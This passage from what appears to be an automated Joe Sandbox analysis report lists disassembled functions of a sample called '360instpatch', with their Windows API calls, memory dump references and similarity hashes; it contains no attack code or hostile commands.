                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastclosesocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1278161333-0
                                                                                                                                                                                                              • Opcode ID: 295f15e3ccd22783d49df1d34b87a76fa4025a77f3155a11e19b634ffb1377ed
                                                                                                                                                                                                              • Instruction ID: 448d8a9fda8beae0bc6a74514326de3cd122c02d26a866a8486b2db0bace97ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 295f15e3ccd22783d49df1d34b87a76fa4025a77f3155a11e19b634ffb1377ed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9301923A100219ABCF05DFB0D895EDE3BB9EF45354F100469F80693220CB35E9A4CBA0
                                                                                                                                                                                                              Function 6BF2C780 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PostMessageW.USER32(6BFCC3F0,000004CC,00000000,00000001), ref: 6BF2C7E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                                                              • Opcode ID: c8ab1124e1554648788265017ea8c48bf8014bf9d5101ca3db4e73ffb1c849d0
                                                                                                                                                                                                              • Instruction ID: 55bc2913e5ee3476106a7eb35dfe0375db7a46136d7cc673efccac5ec20be7fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8ab1124e1554648788265017ea8c48bf8014bf9d5101ca3db4e73ffb1c849d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A101F27AA407029FDB08CF69C841D57BBE5EF88320B11C0AAE909CB371D734D800CBA0
                                                                                                                                                                                                              Function 6BF32675 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: socket.WS2_32(00000002,00000002,00000011), ref: 6BF321C3
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: _memset.LIBCMT ref: 6BF321DB
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: htonl.WS2_32(00000000), ref: 6BF321F2
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: htons.WS2_32(?), ref: 6BF321FA
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: htonl.WS2_32(0100007F), ref: 6BF32216
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: bind.WS2_32(00000000,?,00000010), ref: 6BF32222
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 6BF32693
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonl$_memsetbindclosesockethtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 95467627-0
                                                                                                                                                                                                              • Opcode ID: d4b70e1370926a96fde62358690c77967b84a15cada92baea3eda85b7d31622e
                                                                                                                                                                                                              • Instruction ID: 2fd5f05a7b245b7ba810d278ee4892fedb68b3cf12e2cc2dcbc3d91fe576b73e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4b70e1370926a96fde62358690c77967b84a15cada92baea3eda85b7d31622e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9F028638DD7E42AF73196744C2660B7E94DF03668B080AEAD062964A1E54F95C843E1
                                                                                                                                                                                                              Function 6BF31CB9 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2102423945-0
                                                                                                                                                                                                              • Opcode ID: 4f0838c7f421b8b6c9ea3dabdd0dd994fa26370aea747a0e41250003eaf4a35e
                                                                                                                                                                                                              • Instruction ID: d5ab799c120e7777d22b0b9fbbd0b038a18a4250a10d5a77f6be0250deed3031
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0838c7f421b8b6c9ea3dabdd0dd994fa26370aea747a0e41250003eaf4a35e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95016236A11119ABCB00DBA48801FFF77B9EF45714F10446AE901E7291DB789A1597E2
                                                                                                                                                                                                              Function 6BF37B9F Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2102423945-0
                                                                                                                                                                                                              • Opcode ID: b2bc0367f4c3d1cd88daf1a0f2d87a481b833e268c4979d291cd1ae62c8cf177
                                                                                                                                                                                                              • Instruction ID: 35f116f5dae4b74dc883aedec70b51ed8d125215ef0ecadcdd7c88f5e34a6bd5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2bc0367f4c3d1cd88daf1a0f2d87a481b833e268c4979d291cd1ae62c8cf177
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F0A436A0120AABCB10DFA4C902FEFB7B9EF05610F00041AE901E7250D778EA1487E5
                                                                                                                                                                                                              Function 6BEE8B0A Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_String_base::_Xlen.LIBCPMT ref: 6BEE8B1A
                                                                                                                                                                                                                • Part of subcall function 6BF51FB5: __EH_prolog3.LIBCMT ref: 6BF51FBC
                                                                                                                                                                                                                • Part of subcall function 6BF51FB5: __CxxThrowException@8.LIBCMT ref: 6BF51FE7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8H_prolog3String_base::_ThrowXlenstd::_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675473389-0
                                                                                                                                                                                                              • Opcode ID: e9131c7728ce30436ca99ece98399f72f173fd2ed61b558046b14b774d739e84
                                                                                                                                                                                                              • Instruction ID: ed2e13d1fa7eafa00f1206ba2f26462facc603a52564452422fbe2a71d43fcf1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9131c7728ce30436ca99ece98399f72f173fd2ed61b558046b14b774d739e84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65F0B476708D105ACA319A38C84196FA7B7DBD1B24F310E1FE452C3290EB6D98878173
                                                                                                                                                                                                              Function 6BEE8AAC Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_String_base::_Xlen.LIBCPMT ref: 6BEE8AB9
                                                                                                                                                                                                                • Part of subcall function 6BF51FB5: __EH_prolog3.LIBCMT ref: 6BF51FBC
                                                                                                                                                                                                                • Part of subcall function 6BF51FB5: __CxxThrowException@8.LIBCMT ref: 6BF51FE7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8H_prolog3String_base::_ThrowXlenstd::_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675473389-0
                                                                                                                                                                                                              • Opcode ID: 833466893040a3ceda438ca67234314f77870c7b07240ae729a16707b9ff9a3a
                                                                                                                                                                                                              • Instruction ID: 5a7c245a66a924d6ecaf5de2295e6e981b30f3548173deea53dea1fa25958b80
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 833466893040a3ceda438ca67234314f77870c7b07240ae729a16707b9ff9a3a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F0B4317486105AD6739538D85095FA6B69BD1B28F310F1EE45A832D0EBAC9C838177
                                                                                                                                                                                                              Function 6BEF7D94 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEF7DCA
                                                                                                                                                                                                                • Part of subcall function 6BF231EC: _memset.LIBCMT ref: 6BF23151
                                                                                                                                                                                                                • Part of subcall function 6BF231EC: RasEnumConnectionsW.RASAPI32(?,?,?), ref: 6BF2317C
                                                                                                                                                                                                                • Part of subcall function 6BF231EC: _memset.LIBCMT ref: 6BF2319B
                                                                                                                                                                                                                • Part of subcall function 6BF231EC: RasGetConnectStatusW.RASAPI32(?,?), ref: 6BF231B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$ConnectConnectionsEnumStatus
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3492228599-0
                                                                                                                                                                                                              • Opcode ID: 931d8525b8f15d2f42982349eb91f4e7300eb81fd2a69b13a22acb5b7dcaa49d
                                                                                                                                                                                                              • Instruction ID: 2c5803cf6936168a6dc8feea084437a7b1d8002a135f9e6b37950ed3987164ff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 931d8525b8f15d2f42982349eb91f4e7300eb81fd2a69b13a22acb5b7dcaa49d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86F0BB73D00225B7DB51A6B9DC45BCB7BAC9F01754F508015E904D6250EB78D515CBE0
                                                                                                                                                                                                              Function 6BEED8D3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEED902
                                                                                                                                                                                                                • Part of subcall function 6BF23CE4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,0000083F,?,00000000,?,6BF23E87,?,?,0000083F), ref: 6BF23CFD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2800726579-0
                                                                                                                                                                                                              • Opcode ID: d077d558fe437657e38048e06ced351ef60927a87e3713324fa6c2ed5da8b75b
                                                                                                                                                                                                              • Instruction ID: e95ae062798a4c73d5db89b539183445137f2fcba2004145e98b9751baf7ee95
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d077d558fe437657e38048e06ced351ef60927a87e3713324fa6c2ed5da8b75b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2F068B6900119ABCB10DA64CD41FDEB7BCAB55618F4040A5E708B7191D778AB0A8BA8
                                                                                                                                                                                                              Function 6CD5C24A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6CD5C25C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2882836952-0
                                                                                                                                                                                                              • Opcode ID: 6e233b5500b566d631718aef6a3c4d92525cf147eff8aa721e62f75a1ee98b55
                                                                                                                                                                                                              • Instruction ID: 16f28bcad1511edec54d070b9749566d8eaaeb4df761fe40d0fa8585b644040c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e233b5500b566d631718aef6a3c4d92525cf147eff8aa721e62f75a1ee98b55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F05E71214600EFC6219B5AC804D97B7F8EBCA764B50892DE0AAC6920C271A491CF71
                                                                                                                                                                                                              Function 00B52343 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00B5236A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientRect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 846599473-0
                                                                                                                                                                                                              • Opcode ID: 6f01cd3df9d5280426d03aaf5b48acaa1a8999422e2d68769bce4cf1917b8b45
                                                                                                                                                                                                              • Instruction ID: 5da8f8abb99d655d9ba31102fac6eaa68d8516783259a2d2b3d4ec62d70e9095
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f01cd3df9d5280426d03aaf5b48acaa1a8999422e2d68769bce4cf1917b8b45
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20F0F972800209EFCB10DFADC844DAFFBFCFF95600F00449AA469E3211D670AA05CB50
                                                                                                                                                                                                              Function 6CD34CBD Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6CD34CF0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                                                              • Opcode ID: d8130bc7d041360a135eb9da2728a957687330705f765912e3a53816a5683b4d
                                                                                                                                                                                                              • Instruction ID: a8186bc4d4ba04bdbf0dfd2acf98ac5cd039d8d529f6e71f4645a84f19b2bc39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8130bc7d041360a135eb9da2728a957687330705f765912e3a53816a5683b4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58F0E233205220AFC2119F94AC44C4BBBBDEFC9610710890DF29687161C735D415CB70
                                                                                                                                                                                                              Function 6BF2C7F0 Relevance: 1.5, APIs: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              • PostMessageW.USER32(6BFCC3F0,000004CB,00000000,00000001), ref: 6BF2C839
                                                                                                                                                                                                                • Part of subcall function 6BF2C522: _memset.LIBCMT ref: 6BF2C530
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
